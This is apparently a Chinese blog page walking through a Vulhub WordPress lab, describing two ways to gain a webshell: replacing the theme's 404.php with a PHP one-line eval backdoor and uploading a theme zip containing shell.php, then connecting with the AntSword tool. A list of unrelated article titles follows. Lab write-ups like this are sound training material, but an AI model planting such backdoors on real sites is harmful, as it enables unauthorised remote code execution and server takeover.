当前位置: 首页 > news >正文

Vulnhub-wordpress通关攻略

news 2025/7/2 2:55:17

        姿势一、后台修改模板拿WebShell

        第一步:进⼊Vulhub靶场并执⾏以下命令开启靶场;在浏览器中访问并安装好....

        第二步:找到外观--编辑--404.php,将原内容删除并修改为一句话木马,点击更新--File edited successfully.

<?php eval($_POST[cmd]);?>
        第三步:找到404.php的路径,使用蚁剑进行连接

#URL地址
http://47.103.81.25:8080/wp-content/themes/twentyfifteen/404.php

        姿势二、上传主题拿WebShell

        第一步:找到外观--主题--添加--上传主题--浏览---现在安装

        第二步:在网站上搜索WordPress主题免费下载,将后门文件shell.php加入后压缩为webshell.zip文件,上传

        第三步:使用蚁剑进行连接

http://47.103.81.25:8080/wp-content/themes/webshell/shell.php

                                                                                                                                FROM  IYU_

http://www.dtcms.com/a/80784.html

相关文章:

  • CentOS系类普通挂载磁盘挂载命令
  • 云上 Redis 迁移至本地机房
  • Kafka consumer_offsets 主题深度剖析
  • LabVIEW运动控制(二):EtherCAT运动控制器的多轴示教加工应用(下)
  • npm 命令使用文档
  • 如何在PDF中嵌入数据
  • Excel处理控件Spire.XLS系列教程:C# 在 Excel 中添加或删除单元格边框
  • 【RabbitMQ】RabbitMQ如何保证消息不丢失?
  • sqlite3
  • Linux 音频驱动 WM8960 音频 DAC IC 音乐播放与录音
  • 第四周日志-用网络请求理解bp(2)
  • 华为OD机试-会议室占用时间段(Java 2024 C卷 100分)
  • Rust语言学习
  • 体育直播视频源格式解析:M3U8 vs FLV
  • mysql中find_in_set()函数用法详解及增强函数
  • mysql-DELETE、DROP 和 TRUNCATE区别
  • deepSpeed多机多卡训练服务器之间,和服务器内两个GPU是怎么通信
  • Linux 系统性能优化高级全流程指南
  • 免费开源的NAS解决方案:TrueNAS
  • 工厂方法模式、简单工厂模式与抽象工厂模式的对比
  • 正则表达式:文本处理的瑞士军刀
  • 如何在云端平台上建立 30,000 名用户的网页 MMO游戏环境-2 (服务器)
  • 【工业现场总线】控制网络的主要特点是?OSI参考模型的分层是?
  • `chromadb` 是什么
  • hive 数据简介
  • C++通过宏将任何内容转成字符串的方式
  • Git的基本使用
  • linux 添加自定义文件类型,自定义文件图标,自定义类型默认打开应用 启动菜单
  • 强化学习(赵世钰版)-学习笔记(完)(10.Actor-Critic方法)
  • 玩转物联网-4G模块如何快速将数据上传到巴法云(TCP篇)